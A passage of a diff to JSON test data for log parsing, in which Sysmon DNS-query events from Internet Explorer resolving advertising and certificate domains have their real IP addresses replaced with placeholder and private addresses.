ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.534\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.sharethrough.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5523,7 +5523,7 @@ "identifier": "S-1-5-18" }, "event_data": { - "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:52.55.160.246;::ffff:3.211.67.240;::ffff:35.173.61.59;::ffff:34.233.179.235;::ffff:34.228.105.237;::ffff:52.7.23.213;::ffff:52.201.177.113;::ffff:34.235.70.251;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;", + "QueryResults": "type: 5 match-us-east-1.sharethrough.com;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.534", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5575,7 +5575,7 @@ "event_data": { "QueryName": "tags.rd.linksynergy.com", "QueryStatus": "0", - "QueryResults": "::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;", + "QueryResults": "::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.601", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5586,7 +5586,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:35.241.16.233;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836591400Z'/\u003e\u003cEventRecordID\u003e159\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.601\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etags.rd.linksynergy.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003e::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;2001:502:1ca1::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -5600,7 +5600,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836608300Z'/\u003e\u003cEventRecordID\u003e160\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.604\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ertb-csync.smartadserver.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -5609,7 +5609,7 @@ "ProcessId": "2736", "QueryName": "rtb-csync.smartadserver.com", "QueryStatus": "0", - "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:199.187.193.166;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;", + "QueryResults": "type: 5 2-01-275d-002d.cdx.cedexis.net;type: 5 rtb-csync-tmk.smartadserver.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.604" }, @@ -5638,7 +5638,7 @@ "@timestamp": "2021-05-05T15:30:51.707Z", "winlog": { "event_data": { - "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.621", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5670,7 +5670,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:199.166.0.200;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:04.836626600Z'/\u003e\u003cEventRecordID\u003e161\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.621\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003esc.iasds01.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 anycast.sc.iasds01.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5682,7 +5682,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034646400Z'/\u003e\u003cEventRecordID\u003e162\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003edt.adsafeprotected.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5696,7 +5696,7 @@ }, "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:104.244.38.20;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;192.31.80.30;2001:500:856e::30;192.12.94.30;", + "QueryResults": "type: 5 sjedt.adsafeprotected.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;192.168.80.30;2001:500:856e::30;192.168.94.30;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.822", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5739,7 +5739,7 @@ "ProcessId": "2736", "QueryName": "status.thawte.com", "QueryStatus": "0", - "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;", + "QueryResults": "type: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -5754,7 +5754,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:72.21.91.29;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034657300Z'/\u003e\u003cEventRecordID\u003e163\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.822\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatus.thawte.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ocsp.digicert.com;type: 5 cs9.wac.phicdn.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "kind": "event", "provider": "Microsoft-Windows-Sysmon", "code": "22" @@ -5766,7 +5766,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:05.034798300Z'/\u003e\u003cEventRecordID\u003e164\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.860\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eads.stickyadstv.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon" @@ -5774,7 +5774,7 @@ "winlog": { "event_data": { "QueryStatus": "0", - "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 